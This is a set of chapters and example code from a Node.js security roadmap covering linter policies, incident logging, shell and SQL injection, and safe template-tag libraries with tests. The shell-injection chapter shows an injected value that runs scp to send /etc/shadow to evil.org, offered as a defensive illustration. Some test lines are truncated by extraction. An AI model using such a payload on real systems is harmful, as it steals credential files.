35 | ### Encode lessons learned by the community in linter policies
36 |
37 | Instead of reviewing lots of code, security specialists
38 | should focus on improving tools.
39 | Some APIs and idioms are more prone to misuse than others, and some
40 | should be deprecated in favor of more robust ways of expressing the
41 | same idea. As the community reaches a rough consensus that a code
42 | pattern is prone to misuse or there is a more robust alternative, we
43 | could try to encode that knowledge in an automatable policy.
44 |
45 | Linters are not perfect. There are no sound production-quality static
46 | type systems for JavaScript, so its linters are also necessarily
47 | heuristic. TSLint typically has more fine-grained type information
48 | available than ESLint, so there are probably more anti-patterns that
49 | TSLint can identify with an acceptable false-positive rate than
50 | ESLint, but feedback about what can and can't be expressed in ESLint
51 | might give its maintainers useful feedback.
52 |
53 | Linters can reduce the burden on reviewers by enabling computer aided
54 | code review — helping reviewers focus on areas that use powerful
55 | APIs, and giving a sense of the kinds of problems to look out for.
56 |
57 | They can also give developers a sense of how controversial a review
58 | might be, and guide them in asking the right kinds of questions.
59 |
60 | Custom policies can also help educate developers about alternatives.
61 |
62 | The rule below specifies an anti-pattern for client-side JavaScript
63 | in machine-checkable form, assigns it a name, has a short summary that
64 | can appear in an error message, and a longer description or
65 | documentation URL that explains the reasoning behind the rule.
66 |
67 | It also documents a number of known exceptions to the rule, for
68 | example, APIs that wrap `document.write` to do additional checks.
69 |
70 | ```pb
71 | requirement: {
72 | rule_id: 'closure:documentWrite'
73 | type: BANNED_PROPERTY
74 | error_message: 'Using Document.prototype.write is not allowed. '
75 | 'Use goog.dom.safe.documentWrite instead.'
76 | ''
77 | 'Any content passed to write() will be automatically '
78 | 'evaluated in the DOM and therefore the assignment of '
79 | 'user-controlled, insufficiently sanitized or escaped '
80 | 'content can result in XSS vulnerabilities.'
81 | ''
82 | 'Document.prototype.write is bad for performance as it '
83 | 'forces document reparsing, has unpredictable semantics '
84 | 'and disallows many optimizations a browser may make. '
85 | 'It is almost never needed.'
86 | ''
87 | 'Exceptions allowed for:'
88 | '* writing to a completely new window such as a popup '
89 | ' or an iframe.'
90 | '* frame busting.'
91 | ''
92 | 'If you need to use it, use the type-safe '
93 | 'goog.dom.safe.documentWrite wrapper, or directly '
94 | 'render a Strict Soy template using '
95 | 'goog.soy.Renderer.prototype.renderElement (or similar).'
96 |
97 | value: 'Document.prototype.write'
98 | value: 'Document.prototype.writeln'
99 |
100 | # These uses have been determined to be safe by manual review.
101 | whitelist: 'javascript/closure/async/nexttick.js'
102 | whitelist: 'javascript/closure/base.js'
103 | whitelist: 'javascript/closure/dom/safe.js'
104 | }
105 | ```
106 |
107 | ----
108 |
109 | We propose a project that maintains a set of linter policies per language:
110 |
111 | * A **common** policy suitable for all projects that identifies
112 | anti-patterns that are generally regarded as bad practice by the
113 | community with a low false positive rate.
114 | * A **strict** policy suitable for projects that are willing to
115 | deal with some false positives in exchange for identifying more
116 | potential problems.
117 | * An **experimental** policy that projects that want to contribute to
118 | linter policy development can use.
119 | New rules go here first, so that rule maintainers can get feedback
120 | about their impact on real code.
121 |
122 |
123 | ### Decouple Reviews from Development
124 |
125 | Within a large organization, there are often multiple review cycles, some
126 | concurrent:
127 |
128 | - Reviews of designs and use cases where developers gather information
129 | from others.
130 | - Code reviewers critique pull requests for correctness, maintainability,
131 | testability.
132 | - Release candidate reviews where professional testers examine a
133 | partial system and try to break it.
134 | - Pre-launch reviews where legal, security & privacy, and other
135 | concerned parties come to understand the state of the system and
136 | weigh in on what they need to be able to support its deployment.
137 | - Limited releases where trusted users get to use an application.
138 |
139 | Reviews should happen early and late. When designing a system or a
140 | new feature, technical leads should engage specialists. Before
141 | shipping, they should circle back to double check the implementation.
142 | During rapid development though, developers should drive development
143 | — they may ask questions, and may receive feedback (solicited
144 | and not), but ought not have to halt work while they wait for reviews
145 | from specialists.
146 |
147 | Some changes have a higher security impact than others, so
148 | some will require review by security specialists, but not most.
149 |
150 | During an ongoing security review, security specialists can contribute
151 | use cases and test cases; file issues; and help to integrate tools
152 | like linters, fuzzers, and vulnerability scanners.
153 |
154 | As described in "[Keeping your dependencies close][]", new third-party
155 | modules are of particular interest to security specialists, but
156 | shouldn't require security review before developers use them on an
157 | experimental basis.
158 |
159 | There are many workflows that allow people to work independently
160 | and later circle back so that nothing falls through the cracks.
161 | Below is one that has worked in similar contexts:
162 |
163 | 1. The developer (or the automated import script) files a
164 | tracking issue that is a prerequisite for pre-launch review.
165 | 2. If the developer later finds out that they don't plan on using
166 | the unreviewed module, they can close the tracking issue.
167 | 3. The assigned security specialist asks follow-up questions and
168 | reports their findings via the tracking issue.
169 | 4. A common pre-launch script queries a module metadata
170 | database maintained by security to identify still-unvetted
171 | dependencies.
172 |
173 | [BOF]: ../chapter-1/threat-BOF.md
174 | [CRY]: ../chapter-1/threat-CRY.md
175 | [DEX]: ../chapter-1/threat-DEX.md
176 | [EXF]: ../chapter-1/threat-EXF.md
177 | [LQC]: ../chapter-1/threat-LQC.md
178 | [RCE]: ../chapter-1/threat-RCE.md
179 | [SHP]: ../chapter-1/threat-SHP.md
180 | [QUI]: ../chapter-1/threat-QUI.md
181 | [JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework
182 | [tslint]: https://palantir.github.io/tslint/develop/custom-rules/
183 | [eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules
184 | [Keeping your dependencies close]: ../chapter-4/close_dependencies.md
185 |
--------------------------------------------------------------------------------
/chapter-6/failing.md:
--------------------------------------------------------------------------------
1 | # When all else fails
2 |
3 | ## Background
4 |
5 | The ["Incident Handlers Handbook"][SANS] discusses at length how to
6 | respond to security breaches, but the main takeaways are:
7 |
8 | * You need to do work before incidents happen to be able to
9 | respond effectively.
10 | * Similar measures can lower the rate of incidents.
11 | * You will still have incidents.
12 | * Being in a position to respond effectively can limit damage when
13 | incidents occur.
14 |
15 | Node's proposed [security working group][security-wg]
16 | includes in its charter measures to route information about
17 | vulnerabilities and fixes to the right places, and coordinate response
18 | and disclosure.
19 |
20 | Package monitoring services like [nodesecurity], GitHub's
21 | [package graph][github graph], [snyk][], and the
22 | [nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to
23 | those who need them.
24 |
25 |
26 | ## Problem
27 |
28 | Threats: [0DY][]
29 |
30 | Node's security working group is working on a lot of preparedness
31 | issues so we only address a few.
32 |
33 | ### Naming is hard
34 |
35 | Each of the groups mentioned above is doing great work trying to help
36 | patches get to those who need them. Each seems to be rolling their own
37 | naming scheme for vulnerabilities.
38 |
39 | The computer security community has a
40 | [centralized naming scheme][CVE-IDs] for vulnerability reports so that
41 | reports don't fall through the cracks. Security responders rarely
42 | have the luxury of dealing with a single stack much less a single
43 | layer of that stack so mailing lists are not sufficient — if
44 | reporters roll their own naming scheme or only disclose via
45 | unstructured text, reports will fall through the cracks.
46 |
47 | ### Logging
48 |
49 | When trying to diagnose a problem, responders often look to log files.
50 | There has been much written on how to protect logs from
51 | [forgery][log injection].
52 |
53 | ```js
54 | console.log(s);
55 | ```
56 |
57 | on a stock node runtime allows an attacker who controls `s` to write
58 | any content to a log.
59 |
60 | ```js
61 | console.log('MyModule: ' + s);
62 | ```
63 |
64 | is a bit better. An attacker has to insert a newline character into
65 | `s` to forge another module's log prefix, and can't get rid of the
66 | previous one.
67 |
68 |
69 | ## Success Criteria
70 |
71 | Incident responders would have the tools necessary to do their jobs if
72 |
73 | * Security specialists can subscribe to a stream of notifications
74 | that include the vast majority of actionable security disclosures.
75 | * Responders can narrow down which code generated which log entries.
76 |
77 |
78 | ## Possible solutions
79 |
80 | ### Naming
81 |
82 | Use CVE-IDs if at all possible when disclosing a vulnerability. There
83 | is a CNA for Node.js but that doesn't cover non-core npm modules and
84 | other CNAs cover runtime dependencies like OpenSSL. If there is no
85 | other CNA that is appropriate, MITRE will issue an ID.
86 |
87 | ### Logging
88 |
89 | On module load, the builtin `module.js` creates a new version of
90 | `require` for each module so that it can make sure that the module path
91 | gets passed as the module parent parameter.
92 |
93 | The same mechanism could create a distinct `console` logger for each
94 | module that narrows down the source of a message, and makes it
95 | unambiguous where one message ends and the next starts. For example:
96 |
97 | 1. Replace all `/\r\n?/g` in the log message text with `'\n'`
98 | and emit a CRLF after the log message to prevent forgery by
99 | line splitting.
100 | 2. Prefix it with the module filename and a colon.
101 |
102 | With this, an incident responder reading a log message can reliably
103 | tell that the module mentioned is where the log message originated, as
104 | long as the attacker didn't get write access to the log file.
105 | Preventing log deletion by other processes is better handled by
106 | Linux's `FS_APPEND_FL` and similar mechanisms than in node.
107 |
108 | [nodesecurity]: https://nodesecurity.io/advisories
109 | [github graph]: https://github.com/blog/2447-a-more-connected-universe
110 | [snyk]: https://snyk.io/vuln?packageManager=npm
111 | [nodejs-sec]: https://groups.google.com/group/nodejs-sec
112 | [CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
113 | [log injection]: https://www.owasp.org/index.php/Log_Injection
114 | [0DY]: ../chapter-1/threat-0DY.md
115 | [SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
116 | [security-wg]: https://github.com/nodejs/security-wg
117 |
--------------------------------------------------------------------------------
/chapter-7/child-processes.md:
--------------------------------------------------------------------------------
1 | # Shell injection
2 |
3 | Threats: [SHP][]
4 |
5 | The [`shelljs` module][shelljs] allows access to the system
6 | shell. We focus on `shelljs`, but similar arguments apply to builtins
7 | like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and
8 | similar modules.
9 |
10 | `shelljs` has some nice programmatic APIs for common shell commands
11 | that escape arguments.
12 |
13 | It also provides `shell.exec` which allows full access to the shell
14 | including interpretation of shell meta characters.
15 |
16 | Solving [shell injection][SHP] is a much harder problem than query
17 | injection since shell scripts tend to call other shell scripts, so
18 | properly escaping arguments to one script doesn't help if the script
19 | sloppily composes a sub-shell. The problem of tools that trust their
20 | inputs is not limited to shell scripts: see discussion of image decoders
21 | in [BOF][].
22 |
23 | The [shell grammar][] has more layers of interpretation so is arguably
24 | more complex than any one SQL grammar.
25 |
26 | We can do much better than string concatenation though. The code
27 | below is vulnerable.
28 |
29 | ```js
30 | shelljs.exec("executable '" + x + "'")
31 | ```
32 |
33 | If an attacker causes
34 |
35 | ```js
36 | x = " '; scp /etc/shadow evil@evil.org/; echo ' ";
37 | ```
38 |
39 | then what gets passed to the shell is
40 |
41 | ```js
42 | executable ' '; scp /etc/shadow evil@evil.org/; echo ' '
43 | ```
44 |
45 | Instead, consider:
46 |
47 | ```js
48 | shelljs.exec`executable ${x}`
49 |
50 | shelljs.exec`executable '${x}'`
51 | ```
52 |
53 | This use of tagged templates is roughly equivalent to
54 |
55 | ```js
56 | shelljs.exec(["executable ", ""], x)
57 |
58 | shelljs.exec(["executable \'", "\'"], x)
59 | ```
60 |
61 | This way, when control reaches `shelljs`, it knows which strings came
62 | from the developer: `["executable ", ""]`, and which are inline
63 | expressions: `x`. If `shelljs` properly escapes the latter, it
64 | prevents the breach above.
65 |
66 | The accompanying example ([code][sh-code]) includes a tag
67 | implementation for `sh` and `bash` that recognizes complex nesting
68 | semantics.
69 |
70 | We can't, working within the confines of Node, prevent poorly written
71 | command line tools from breaking when exposed to untrusted inputs, but
72 | we can make sure that we preserve the developer's intent when they
73 | write code that invokes command line tools. For projects that have
74 | legitimate reasons for invoking sub-shells, consistently using
75 | template tags like this solves some problems and makes it more likely
76 | that effort spent hardening command line tools will yield fruit.
77 |
78 | [shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10
79 | [shelljs]: https://www.npmjs.com/package/shelljs
80 | [cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options
81 | [SHP]: ../chapter-1/threat-SHP.md
82 | [BOF]: ../chapter-1/threat-BOF.md
83 | [sh-code]: https://github.com/mikesamuel/sh-template-tag
84 |
--------------------------------------------------------------------------------
/chapter-7/examples/sh/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "sh-template-tag",
3 | "description": "string template tags for safely composing shell strings",
4 | "keywords": [
5 | "shell",
6 | "child_process",
7 | "security",
8 | "injection",
9 | "template",
10 | "template-tag",
11 | "string-template",
12 | "sec-roadmap",
13 | "es6"
14 | ],
15 | "version": "0.0.0",
16 | "author": "Mike Samuel",
17 | "license": "Apache-2.0",
18 | "main": "index.js",
19 | "files": [
20 | "index.js"
21 | ],
22 | "dependencies": {
23 | "template-tag-common": ">=1.0.2"
24 | },
25 | "devDependencies": {
26 | "chai": ">=4.1.2",
27 | "eslint": ">=4.15.0",
28 | "eslint-config-strict": "*",
29 | "eslint-config-standard": "*",
30 | "mocha": ">=4.0.1",
31 | "standard": "*"
32 | },
33 | "scripts": {
34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha"
35 | },
36 | "eslintConfig": {
37 | "extends": [
38 | "strict",
39 | "standard"
40 | ]
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/chapter-7/examples/sh/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | /* eslint "id-length": off */
19 |
20 | const { expect } = require('chai')
21 | const { describe, it } = require('mocha')
22 | const { sh, ShFragment, makeLexer } = require('../index')
23 |
24 | /**
25 | * Feeds chunks to the lexer and concatenates contexts.
26 | * Tests that the lexer ends in a valid end state and
27 | * appends '_ERR_' as an end state if not.
28 | */
29 | function tokens (...chunks) {
30 | const lexer = makeLexer()
31 | const out = []
32 | for (let i = 0, len = chunks.length; i < len; ++i) {
33 | out.push(lexer(chunks[i])[0] || '_')
34 | }
35 | try {
36 | lexer(null)
37 | } catch (exc) {
38 | out.push('_ERR_')
39 | }
40 | return out.join(',')
41 | }
42 |
43 | // Unwrap an ShFragment, failing if the result is not one.
44 | function unwrap (x) {
45 | if (x instanceof ShFragment) {
46 | return String(x)
47 | }
48 | throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`)
49 | }
50 |
51 | // Run a test multiply to exercise the memoizing code.
52 | function runShTest (golden, test) {
53 | for (let i = 3; --i >= 0;) {
54 | if (golden === '_ERR_') {
55 | expect(test).to.throw()
56 | } else {
57 | expect(unwrap(test())).to.equal(golden)
58 | }
59 | }
60 | }
61 |
62 | describe('sh template tags', () => {
63 | describe('lexer', () => {
64 | it('empty string', () => {
65 | expect(tokens('')).to.equal('_')
66 | })
67 | it('word', () => {
68 | expect(tokens('foo')).to.equal('_')
69 | })
70 | it('words', () => {
71 | expect(tokens('foo bar baz')).to.equal('_')
72 | })
73 | it('words split', () => {
74 | expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_')
75 | })
76 | it('parens', () => {
77 | expect(tokens('foo (bar) baz')).to.equal('_')
78 | })
79 | it('parens split', () => {
80 | expect('_,_,(,_,_,_').to.equal(
81 | tokens('foo', ', ', '(bar', ')', ' ', 'baz'))
82 | })
83 | it('parens hanging split', () => {
84 | expect('_,_,(,(,(,_ERR_').to.equal(
85 | tokens('foo', ', ', '(bar', ' ', 'baz'))
86 | })
87 | it('quotes embed subshell', () => {
88 | expect('",$(,_').to.equal(
89 | tokens(' "foo', '$(bar ', ' baz)" boo'))
90 | })
91 | it('quotes embed arithshell', () => {
92 | expect('",$((,$((,",_').to.equal(
93 | tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo'))
94 | })
95 | it('quotes embed backticks', () => {
96 | expect('",`,`,",_').to.equal(
97 | tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo'))
98 | })
99 | it('escape affects subshell', () => {
100 | expect('",",",",_').to.equal(
101 | tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo'))
102 | })
103 | it('single quotes do not embed', () => {
104 | expect(`',',',',_`).to.equal(
105 | tokens(
106 | ' \' $(',
107 | 'foo) $((',
108 | 'bar))',
109 | ' `',
110 | ' ` # \' '))
111 | })
112 | it('unterminated comment', () => {
113 | expect('#,_ERR_').to.equal(
114 | tokens(' #foo'))
115 | })
116 | it('terminated comment', () => {
117 | expect('_').to.equal(
118 | tokens(' #foo\n'))
119 | })
120 | it('terminated comment split', () => {
121 | expect('#,_').to.equal(
122 | tokens(' #foo', 'bar\n'))
123 | })
124 | it('arithshell', () => {
125 | expect('_,$((,$((,_,_').to.equal(
126 | tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo'))
127 | })
128 | it('backticks', () => {
129 | expect('_,`,`,_,_').to.equal(
130 | tokens('foo', '`bar ', '(far)', ' baz`', ' boo'))
131 | })
132 | it('subshell paren disambiguation', () => {
133 | expect('$(,(,$(,",_,_').to.equal(tokens(
134 | 'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', ''))
135 | })
136 | it('hash not after space', () => {
137 | expect('_,_').to.equal(
138 | tokens('echo foo#', ''))
139 | })
140 | it('hash after space', () => {
141 | expect('#,#,_ERR_').to.equal(
142 | tokens('echo foo #', ''))
143 | })
144 | it('hash concatenation hazard', () => {
145 | expect(() => tokens('#foo')).to.throw()
146 | })
147 | it('intermediate concatenation hazard', () => {
148 | expect(() => tokens('echo foo', '#bar')).to.throw()
149 | })
150 | it('escaped intermediate concatenation hazard', () => {
151 | expect('_,_').to.equal(tokens(
152 | 'echo foo', '\\#bar'))
153 | })
154 | it('simple heredoc', () => {
155 | expect(tokens('cat < {
158 | // Concatenation hazard when no eol at end
159 | expect(tokens('cat < {
162 | expect(tokens('cat < {
165 | expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('< {
168 | expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_')
169 | })
170 | it('bad heredoc label', () => {
171 | expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw()
172 | })
173 | it('missing heredoc label', () => {
174 | expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw()
175 | })
176 | })
177 |
178 | const str = 'a"\'\n\\$b'
179 | const numb = 1234
180 | const frag = new ShFragment(' frag ')
181 | describe('template tag', () => {
182 | it('string in top level', () => {
183 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`)
184 | })
185 | it('number in top level', () => {
186 | runShTest(`echo '1234'`, () => sh`echo ${numb}`)
187 | })
188 | it('fragment in top level', () => {
189 | runShTest(`echo frag `, () => sh`echo ${frag}`)
190 | })
191 | it('string in dq', () => {
192 | runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`)
193 | })
194 | it('number in dq', () => {
195 | runShTest(`echo "1234"`, () => sh`echo "${numb}"`)
196 | })
197 | it('fragment in dq', () => {
198 | runShTest(`echo " frag "`, () => sh`echo "${frag}"`)
199 | })
200 | it('string in sq', () => {
201 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`)
202 | })
203 | it('number in sq', () => {
204 | runShTest(`echo '1234'`, () => sh`echo '${numb}'`)
205 | })
206 | it('fragment in sq', () => {
207 | runShTest(`echo ' frag '`, () => sh`echo '${frag}'`)
208 | })
209 | it('string in embed', () => {
210 | runShTest(
211 | `echo $(echo 'a"'"'"'\n\\$b')`,
212 | () => sh`echo $(echo ${str})`)
213 | })
214 | it('number in embed', () => {
215 | runShTest(
216 | `echo $(echo '1234')`,
217 | () => sh`echo $(echo ${numb})`)
218 | })
219 | it('fragment in embed', () => {
220 | runShTest(
221 | `echo $(echo frag )`,
222 | () => sh`echo $(echo ${frag})`)
223 | })
224 | it('hash ambig string', () => {
225 | runShTest(`_ERR_`, () => sh`echo foo${str}#bar`)
226 | })
227 | it('hash ambig fragment', () => {
228 | runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`)
229 | })
230 | it('heredoc string', () => {
231 | runShTest(
232 | '\ncat < sh`
234 | cat < {
240 | runShTest(
241 | '\ncat < sh`
243 | cat < {
249 | runShTest(
250 | '\ncat < sh`
252 | cat < {
258 | runShTest(
259 | `
260 | cat < sh`
268 | cat < {
80 | if (errorMessage) {
81 | // Replay the error message if we've already failed.
82 | throw new Error(errorMessage)
83 | }
84 | text = String(text)
85 | while (text) {
86 | const pattern = delimiter
87 | ? DELIMITED_BODIES[delimiter]
88 | : PREFIX_BEFORE_DELIMITER
89 | const match = pattern.exec(text)
90 | if (!match) {
91 | throw new Error(
92 | errorMessage = msg`Failed to lex starting at ${text}`)
93 | }
94 | let nConsumed = match[0].length
95 | if (text.length > nConsumed) {
96 | const chr = text.charAt(nConsumed)
97 | if (delimiter) {
98 | if (chr === delimiter) {
99 | delimiter = null
100 | ++nConsumed
101 | } else {
102 | throw new Error(
103 | errorMessage = msg`Expected ${chr} at ${text}`)
104 | }
105 | } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) {
106 | delimiter = chr
107 | ++nConsumed
108 | } else {
109 | throw new Error(
110 | errorMessage = msg`Expected delimiter at ${text}`)
111 | }
112 | }
113 | text = text.substring(nConsumed)
114 | }
115 | return delimiter
116 | }
117 | }
118 |
119 | /** A string wrapper that marks its content as a SQL identifier; appendValue escapes such values with mysql.escapeId. */
120 | class Identifier extends TypedString {}
121 |
122 | /**
123 | * A string wrapper that marks its content as a series of
124 | * well-formed SQL tokens; appendValue inserts such values without escaping them.
125 | */
126 | class SqlFragment extends TypedString {}
127 |
128 | /**
129 | * Analyzes the static parts of the tag content.
130 | *
131 | * @return An record like { delimiters, chunks }
132 | * where delimiter is a contextual cue and chunk is
133 | * the adjusted raw text.
134 | */
135 | function computeStatic (strings) {
136 | const { raw } = trimCommonWhitespaceFromLines(strings)
137 |
138 | const delimiters = []
139 | const chunks = []
140 |
141 | const lexer = makeLexer()
142 |
143 | let delimiter = null
144 | for (let i = 0, len = raw.length; i < len; ++i) {
145 | let chunk = String(raw[i])
146 | if (delimiter === '`') {
147 | // Treat raw \` in an identifier literal as an ending delimiter.
148 | chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`')
149 | }
150 | const newDelimiter = lexer(chunk)
151 | if (newDelimiter === '`' && !delimiter) {
152 | // Treat literal \` outside a string context as starting an
153 | // identifier literal
154 | chunk = chunk.replace(
155 | /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2')
156 | }
157 |
158 | chunks.push(chunk)
159 | delimiters.push(newDelimiter)
160 | delimiter = newDelimiter
161 | }
162 |
163 | if (delimiter) {
164 | throw new Error(`Unclosed quoted string: ${delimiter}`)
165 | }
166 |
167 | return { raw, delimiters, chunks }
168 | }
169 |
170 | function interpolateSqlIntoFragment (
171 | { raw, delimiters, chunks }, strings, values) { // strings is not read in this function
172 | // Interleaves the escaped values with the static chunks. result is a buffer to accumulate output.
173 | let [ result ] = chunks
174 | for (let i = 1, len = raw.length; i < len; ++i) {
175 | const chunk = chunks[i]
176 | // The count of values must be 1 less than the surrounding
177 | // chunks of literal text.
178 | if (i !== 0) { // always true here because the loop starts at 1
179 | const delimiter = delimiters[i - 1] // lexer state after the preceding chunk, i.e. where this value lands
180 | const value = values[i - 1]
181 | if (delimiter) {
182 | result += escapeDelimitedValue(value, delimiter) // value sits inside an open quoted region
183 | } else {
184 | result = appendValue(result, value, chunk) // value sits outside any quoted region
185 | }
186 | }
187 |
188 | result += chunk
189 | }
190 |
191 | return new SqlFragment(result)
192 | }
193 |
194 | function escapeDelimitedValue (value, delimiter) { // escapes value for insertion inside an already-open quoted region
195 | if (delimiter === '`') {
196 | return mysql.escapeId(String(value)).replace(/^`|`$/g, '') // strip the leading and trailing backtick from the escaped id
197 | }
198 | const escaped = mysql.escape(String(value))
199 | return escaped.substring(1, escaped.length - 1) // drop the first and last characters (presumably the quotes mysql.escape adds)
200 | }
201 |
202 | function appendValue (resultBefore, value, chunk) { // returns resultBefore with value (or each element of an array value) appended
203 | let needsSpace = false
204 | let result = resultBefore
205 | const valueArray = Array.isArray(value) ? value : [ value ] // treat a single value as a one-element list
206 | for (let i = 0, nValues = valueArray.length; i < nValues; ++i) {
207 | if (i) {
208 | result += ', ' // separator between consecutive array elements
209 | }
210 |
211 | const one = valueArray[i]
212 | let valueStr = null
213 | if (one instanceof SqlFragment) {
214 | if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) { // unless result is empty or ends with whitespace, ',' or '('
215 | result += ' '
216 | }
217 | valueStr = one.toString() // fragments are appended without escaping
218 | needsSpace = i + 1 === nValues // only a fragment in the last position can require a trailing space
219 | } else if (one instanceof Identifier) {
220 | valueStr = mysql.escapeId(one.toString())
221 | } else {
222 | // If we need to handle nested arrays, we would recurse here.
223 | valueStr = mysql.format('?', one)
224 | }
225 | result += valueStr
226 | }
227 |
228 | if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) { // skip when the next chunk is empty or starts with whitespace, ',' or ')'
229 | result += ' '
230 | }
231 |
232 | return result
233 | }
234 |
235 | /**
236 | * Template tag function that contextually autoescapes values
237 | * producing a SqlFragment.
238 | */
239 | const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment)
240 |
241 | exports.Identifier = Identifier
242 | exports.SqlFragment = SqlFragment
243 | exports.sql = sql
244 |
245 | if (global.it) {
246 | // Expose for testing.
247 | // Harmless if this leaks
248 | exports.makeLexer = makeLexer
249 | }
250 |
--------------------------------------------------------------------------------
/chapter-7/examples/sql/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "mysql-template-tag",
3 | "description": "string template tags for safely composing SQL",
4 | "keywords": [
5 | "sql",
6 | "security",
7 | "injection",
8 | "template",
9 | "template-tag",
10 | "string-template",
11 | "sec-roadmap",
12 | "es6"
13 | ],
14 | "version": "0.0.0",
15 | "author": "Mike Samuel",
16 | "license": "Apache-2.0",
17 | "main": "index.js",
18 | "files": [
19 | "index.js"
20 | ],
21 | "dependencies": {
22 | "mysql": "2.15.0",
23 | "template-tag-common": ">=1.0.2"
24 | },
25 | "devDependencies": {
26 | "chai": ">=4.1.2",
27 | "eslint": ">=4.15.0",
28 | "eslint-config-strict": "*",
29 | "eslint-config-standard": "*",
30 | "mocha": ">=4.0.1",
31 | "standard": "*"
32 | },
33 | "scripts": {
34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha"
35 | },
36 | "eslintConfig": {
37 | "extends": [
38 | "strict",
39 | "standard"
40 | ]
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/chapter-7/examples/sql/test/test.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | /* eslint "no-magic-numbers": off */
19 |
20 | const { expect } = require('chai')
21 | const { describe, it } = require('mocha')
22 | const index = require('../index')
23 |
24 | function tokens (...chunks) { // feeds each chunk to a fresh lexer and joins the reported states with ','
25 | const lexer = index.makeLexer()
26 | const out = []
27 | for (let i = 0, len = chunks.length; i < len; ++i) {
28 | out.push(lexer(chunks[i]) || '_') // '_' stands in for a falsy lexer result
29 | }
30 | return out.join(',')
31 | }
32 |
33 | describe('sql template tags', () => {
34 | describe('lexer', () => {
35 | it('empty string', () => {
36 | expect(tokens('')).to.equal('_')
37 | })
38 | it('hash comments', () => {
39 | expect(tokens(' # "foo\n', '')).to.equal('_,_')
40 | })
41 | it('dash comments', () => {
42 | expect(tokens(' -- \'foo\n', '')).to.equal('_,_')
43 | })
44 | it('block comments', () => {
45 | expect(tokens(' /* `foo */', '')).to.equal('_,_')
46 | })
47 | it('dq', () => {
48 | expect(tokens('SELECT "foo"')).to.equal('_')
49 | expect(tokens('SELECT `foo`, "foo"')).to.equal('_')
50 | expect(tokens('SELECT "', '"')).to.equal('",_')
51 | expect(tokens('SELECT "x', '"')).to.equal('",_')
52 | expect(tokens('SELECT "\'', '"')).to.equal('",_')
53 | expect(tokens('SELECT "`', '"')).to.equal('",_')
54 | expect(tokens('SELECT """', '"')).to.equal('",_')
55 | expect(tokens('SELECT "\\"', '"')).to.equal('",_')
56 | })
57 | it('sq', () => {
58 | expect(tokens('SELECT \'foo\'')).to.equal('_')
59 | expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_')
60 | expect(tokens('SELECT \'', '\'')).to.equal('\',_')
61 | expect(tokens('SELECT \'x', '\'')).to.equal('\',_')
62 | expect(tokens('SELECT \'"', '\'')).to.equal('\',_')
63 | expect(tokens('SELECT \'`', '\'')).to.equal('\',_')
64 | expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_')
65 | expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_')
66 | })
67 | it('bq', () => {
68 | expect(tokens('SELECT `foo`')).to.equal('_')
69 | expect(tokens('SELECT "foo", `foo`')).to.equal('_')
70 | expect(tokens('SELECT `', '`')).to.equal('`,_')
71 | expect(tokens('SELECT `x', '`')).to.equal('`,_')
72 | expect(tokens('SELECT `\'', '`')).to.equal('`,_')
